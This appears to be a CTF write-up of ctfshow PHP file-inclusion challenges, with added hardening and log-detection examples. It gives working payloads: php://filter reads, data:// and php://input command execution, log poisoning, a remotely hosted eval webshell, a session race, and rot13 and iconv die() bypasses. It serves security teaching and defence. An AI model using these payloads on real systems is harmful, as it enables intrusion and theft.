ctfshow file inclusion

web78: no protection, read the source

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);   // user-controlled value reaches include() unchanged
}else{
    highlight_file(__FILE__);
}

Read the file through the php://filter wrapper, then base64-decode the output:

php://filter/read=convert.base64-encode/resource=flag.php

web79: data:// wrapper

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);   // case-sensitive blacklist
    include($file);
}else{
    highlight_file(__FILE__);
}

The string "php" is replaced, but str_replace() is case-sensitive, so an upper-case PHP open tag passes. The file name flag.php cannot be written in upper case, so use a command such as tac fl* that never spells out the file name. Alternatively, base64-encode the data:// payload so that "php" never appears literally in the parameter.

?file=data://text/plain,<?PHP system('tac fl*');?>

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= decodes to <?php system('cat flag.php');

web80: php://input

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);    // both replacements are
    $file = str_replace("data", "???", $file);   // case-sensitive
    include($file);
}else{
    highlight_file(__FILE__);
}

Both php and data are filtered. php://input with mixed case works; checking in Burp, I then also used the log file method.

GET: ?file=phP://input
POST body: <?PHP system('tac fl*');?>

The request URL and User-Agent are written to the web server's access log, so a payload placed in either executes once the log file is included.

First request: User-Agent: <?php system('tac fl*');?>

Second request: ?file=/var/log/nginx/access.log

Remote file inclusion also works for this challenge: after hosting the file, connect with AntSword or execute commands directly.

Where xxxx is your own server: ?file=http://xxxx/shell.txt
Contents of shell.txt: <?php eval($_POST[1]);?>
POST body: 1=system('tac f*');

web81: log inclusion

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);   // new: no "://" wrappers at all
    include($file);
}else{
    highlight_file(__FILE__);
}

One more filter, the colon. Including the log file still works, so use the previous method:

First request: User-Agent: <?php system('tac fl*');?>

Second request: ?file=/var/log/nginx/access.log

With ":" filtered, remote file inclusion (http://) is no longer possible.
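As an added example (not ctfshow's challenge code): the include pattern from web78 to web81, with its blacklist, beside a hardened version that rejects every payload shown above. The pages directory PAGES_DIR and the "page name" parameter are assumptions made for this example.

```php
<?php
// Added example, not the challenge code: the web78-web81 include pattern
// beside a hardened version. PAGES_DIR (where includable pages live) and the
// "page name" parameter are assumptions made for this example.
const PAGES_DIR = __DIR__ . '/pages';

// The challenge's control: a blacklist over the raw parameter. str_replace()
// is case-sensitive and knows nothing about wrappers, so "phP://input",
// data://, /var/log/... and http:// all get through, as shown above.
function blacklisted_path(string $file): string {
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    return $file;            // the challenge then does include($file)
}

// Hardened: the user supplies a page name, never a path. The name must be a
// plain identifier, so "://", "/", ".", "%" and "<?" can never reach
// include(); the extension is fixed server-side; realpath() then confines
// the result to PAGES_DIR (this also rejects a symlink pointing outside).
// Returns null for anything that is not an existing page.
function resolve_include(string $name): ?string {
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $name)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $name . '.php');
    if ($base === false || $path === false || strpos($path, $base . '/') !== 0) {
        return null;
    }
    return $path;
}
// Belt and braces in php.ini: allow_url_include=Off (and allow_url_fopen=Off
// where the app does not need it) closes remote inclusion independently.

// Every payload from the write-up is rejected before include() is reached;
// "home" resolves only if pages/home.php actually exists.
$payloads = [
    'php://filter/read=convert.base64-encode/resource=flag.php',
    "data://text/plain,<?PHP system('tac fl*');?>",
    'phP://input',
    '/var/log/nginx/access.log',
    'http://xxxx/shell.txt',
    'home',
];
foreach ($payloads as $p) {
    $r = resolve_include($p);
    printf("%s\n  after blacklist: %s\n  hardened: %s\n",
           $p, blacklisted_path($p), $r === null ? 'rejected' : $r);
}
```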

web82: session.upload_progress

New technique. The idea is to upload a file with a controllable PHP_SESSION_UPLOAD_PROGRESS value so that PHP writes a temporary session file, /tmp/sess_xxx, and then to use that file as the include target (see the freebuf explanation). Because the file is temporary, a race condition has to be won; this can be done with a script or by brute-forcing with Burp. The steps follow.
First make your own web page and change the form address to the challenge:

<!DOCTYPE html>
<html>
<body>
<form action="http://ff1886cd-dda8-48a2-8182-c1b98d685973.challenge.ctf.show:8080" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>

Capture the upload request in Burp after submitting.

This page creates the temporary session file. Next, capture a request to the challenge page that includes it. Knowing the temporary file's path is of course a precondition for exploiting this.

With both requests captured, send them at the same time: one keeps creating the temporary file and the other keeps including it. Winning this race condition gives code execution.

Then change the command to read the flag.

web83: deletes uninitialized sessions

web84: deletes all temporary files before the include

As long as I brute-force fast enough, rm can't keep up with me.

web85: checks for < angle brackets

web86: defines the include path

web87: rot13

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    // the blacklist runs before urldecode(), and the written file is prefixed with die()
    file_put_contents(urldecode($file), "<?php die('Big man, stop showing');?>".$content);
}else{
    highlight_file(__FILE__);
}

The die() prefix written to the file can be bypassed with a base64 or rot13 write filter. Because the challenge calls urldecode() on the file name after the blacklist, the parameter has to be URL-encoded twice so that "php", ":" and "." are never seen by the filter.

php://filter/write=string.rot13/resource=1.php, URL-encoded twice:
GET: ?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%32%25%36%66%25%37%34%25%33%31%25%33%33%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30
rot13 of <?php system('tac f*');?> gives the POST body:
POST: content=<?cuc flfgrz('gnp s*');?>

Visit 1.php: the file was written and the flag is returned. The base64 variant works the same way and is just as simple.

web88

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    // case-insensitive blacklist; ":" and "/" are not in it
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

Neither ":" nor "/" is filtered, so the data:// wrapper with a base64 body reads the flag directly:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZionKTs/Pg

web116: carve the picture with foremost

Save the video locally, open it in 010 Editor, locate the PNG file header, and carve the picture out with foremost.


The picture turns out to be the source code. The earlier filters do not matter here because the code uses file_get_contents(), so the flag can be read directly; it only appears in the raw response, so view it in the captured packet.

?file=flag.php

?file=compress.zlib:///var/www/html/flag.php

web117: bypass die()

<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($x){
    // blocks the usual wrappers and the base64/rot13 write filters, but not convert.iconv
    if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);

Whatever is passed, the written file starts with <?php die();?>, so die() has to be bypassed first. If file and contents go through a "special" write filter such as base64 or rot13, the <?php die();?> prefix is transformed as well and no longer takes effect. base64 and rot13 are blocked here, though, so something similar is needed: a character-set conversion supported by php. Converting UCS-2LE to UCS-2BE swaps every pair of adjacent bytes, which is what the payload below relies on.

GET: ?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php
POST: contents=?<hp pvela$(P_SO[T]1;)>?

Then post the command directly to a.php:

GET: a.php
POST: 1=system('tac f*');
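As an added example (not part of the write-up): a small detector that scans nginx access-log lines for the indicators used across these challenges, covering the wrapper and log-poisoning requests of web78 to web81 as well as the double-encoded and iconv write filters of web87 and web117. The log lines are constructed for this example, the combined-log layout and the parameter name file are assumed.

```php
<?php
// Added example, not part of the write-up: scan access-log lines for the
// inclusion and write-filter indicators seen in web78-web117. Sample lines
// below are constructed; combined-log format and the "file" parameter are
// assumptions for this example.

function decode_param(string $s): string {
    // nginx logs the raw request line. Decode until the value stops changing
    // (bounded), so the double-URL-encoded php://filter of web87 shows up the
    // same way the challenge's own urldecode() would reveal it.
    for ($i = 0; $i < 3 && ($d = urldecode($s)) !== $s; $i++) {
        $s = $d;
    }
    return $s;
}

function inclusion_indicators(string $line): array {
    // "METHOD target HTTP/x" status bytes "referer" "user-agent"
    if (!preg_match('/"(?:GET|POST) (\S+) [^"]*" \d+ \d+ "[^"]*" "([^"]*)"/', $line, $m)) {
        return [];
    }
    $target = decode_param($m[1]);
    $ua     = decode_param($m[2]);
    $rules  = [
        'stream wrapper in file param' => '~\b(?:php|data|compress\.zlib)://|\bdata:~i',
        'read/write filter chain'      => '~(?:string\.rot13|convert\.(?:base64|iconv))~i',
        'log file as include target'   => '~[?&]file=/var/log/~i',
        'remote include URL'           => '~[?&]file=https?://~i',
    ];
    $hits = [];
    foreach ($rules as $name => $re) {
        if (preg_match($re, $target)) $hits[] = $name;
    }
    // Log poisoning (web80/web81): a PHP open tag in the User-Agent header.
    if (preg_match('~<\?(?:php)?~i', $ua)) $hits[] = 'php open tag in user-agent';
    return $hits;
}

// Constructed sample lines: one benign, then one per technique.
$sample = [
    '10.0.0.5 - - [19/Sep/2021:08:23:04 -0400] "GET /index.php HTTP/1.1" 200 210 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [19/Sep/2021:08:23:05 -0400] "GET /?file=php://filter/read=convert.base64-encode/resource=flag.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [19/Sep/2021:08:23:06 -0400] "POST /?file=phP://input HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [19/Sep/2021:08:23:07 -0400] "GET / HTTP/1.1" 200 30 "-" "<?php system(\'tac fl*\');?>"',
    '10.0.0.5 - - [19/Sep/2021:08:23:08 -0400] "GET /?file=/var/log/nginx/access.log HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [19/Sep/2021:08:23:09 -0400] "GET /?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66filter/write=string.rot13/resource=1.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
];
foreach ($sample as $i => $line) {
    $hits = inclusion_indicators($line);
    printf("line %d: %s\n", $i, $hits ? implode(', ', $hits) : 'clean');
}
```

The first line reports clean; each of the others reports the technique it carries, with the last one matched only because the parameter is decoded twice before the rules run.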

Tags: PHP CTF

Posted on Sun, 19 Sep 2021 08:23:04 -0400 by Renlok